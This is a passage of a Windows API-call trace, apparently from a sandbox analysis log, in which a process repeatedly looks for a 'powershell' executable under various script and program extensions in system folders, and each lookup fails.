	[0409.150] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.157] SetErrorMode (uMode=0x1) returned 0x1
	[0409.158] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.158] SetErrorMode (uMode=0x1) returned 0x1
	[0409.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.461] SetErrorMode (uMode=0x1) returned 0x1
	[0409.462] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.462] SetErrorMode (uMode=0x1) returned 0x1
	[0409.463] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.470] SetErrorMode (uMode=0x1) returned 0x1
	[0409.471] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.471] SetErrorMode (uMode=0x1) returned 0x1
	[0409.471] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.480] SetErrorMode (uMode=0x1) returned 0x1
	[0409.481] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.481] SetErrorMode (uMode=0x1) returned 0x1
	[0409.481] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.489] SetErrorMode (uMode=0x1) returned 0x1
	[0409.491] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.491] SetErrorMode (uMode=0x1) returned 0x1
	[0409.491] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.498] SetErrorMode (uMode=0x1) returned 0x1
	[0409.499] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.499] SetErrorMode (uMode=0x1) returned 0x1
	[0409.499] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.833] SetErrorMode (uMode=0x1) returned 0x1
	[0409.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.835] SetErrorMode (uMode=0x1) returned 0x1
	[0409.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.835] SetErrorMode (uMode=0x1) returned 0x1
	[0409.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.835] SetErrorMode (uMode=0x1) returned 0x1
	[0409.835] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.836] SetErrorMode (uMode=0x1) returned 0x1
	[0409.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.836] SetErrorMode (uMode=0x1) returned 0x1
	[0409.836] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.836] SetErrorMode (uMode=0x1) returned 0x1
	[0409.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.836] SetErrorMode (uMode=0x1) returned 0x1
	[0409.836] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.837] SetErrorMode (uMode=0x1) returned 0x1
	[0409.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.837] SetErrorMode (uMode=0x1) returned 0x1
	[0409.837] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.837] SetErrorMode (uMode=0x1) returned 0x1
	[0409.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.837] SetErrorMode (uMode=0x1) returned 0x1
	[0409.838] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.838] SetErrorMode (uMode=0x1) returned 0x1
	[0409.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.838] SetErrorMode (uMode=0x1) returned 0x1
	[0409.838] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.838] SetErrorMode (uMode=0x1) returned 0x1
	[0409.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.839] SetErrorMode (uMode=0x1) returned 0x1
	[0409.839] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.839] SetErrorMode (uMode=0x1) returned 0x1
	[0409.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.839] SetErrorMode (uMode=0x1) returned 0x1
	[0409.839] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.839] SetErrorMode (uMode=0x1) returned 0x1
	[0409.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.840] SetErrorMode (uMode=0x1) returned 0x1
	[0409.840] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.840] SetErrorMode (uMode=0x1) returned 0x1
	[0409.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.840] SetErrorMode (uMode=0x1) returned 0x1
	[0409.840] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.840] SetErrorMode (uMode=0x1) returned 0x1
	[0409.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.841] SetErrorMode (uMode=0x1) returned 0x1
	[0409.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.841] SetErrorMode (uMode=0x1) returned 0x1
	[0409.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.841] SetErrorMode (uMode=0x1) returned 0x1
	[0409.841] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.841] SetErrorMode (uMode=0x1) returned 0x1
	[0409.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.842] SetErrorMode (uMode=0x1) returned 0x1
	[0409.842] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.842] SetErrorMode (uMode=0x1) returned 0x1
	[0409.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0409.842] SetErrorMode (uMode=0x1) returned 0x1
	[0409.842] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.842] SetErrorMode (uMode=0x1) returned 0x1
	[0409.843] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.843] SetErrorMode (uMode=0x1) returned 0x1
	[0409.843] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.843] SetErrorMode (uMode=0x1) returned 0x1
	[0409.843] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.843] SetErrorMode (uMode=0x1) returned 0x1
	[0409.843] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.843] SetErrorMode (uMode=0x1) returned 0x1
	[0409.844] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.844] SetErrorMode (uMode=0x1) returned 0x1
	[0409.844] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.844] SetErrorMode (uMode=0x1) returned 0x1
	[0409.844] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.844] SetErrorMode (uMode=0x1) returned 0x1
	[0409.844] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.844] SetErrorMode (uMode=0x1) returned 0x1
	[0409.844] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.845] SetErrorMode (uMode=0x1) returned 0x1
	[0409.845] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.845] SetErrorMode (uMode=0x1) returned 0x1
	[0409.845] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.845] SetErrorMode (uMode=0x1) returned 0x1
	[0409.845] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.845] SetErrorMode (uMode=0x1) returned 0x1
	[0409.846] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.846] SetErrorMode (uMode=0x1) returned 0x1
	[0409.846] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.846] SetErrorMode (uMode=0x1) returned 0x1
	[0409.847] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.847] SetErrorMode (uMode=0x1) returned 0x1
	[0409.847] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.847] SetErrorMode (uMode=0x1) returned 0x1
	[0409.847] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0409.847] SetErrorMode (uMode=0x1) returned 0x1
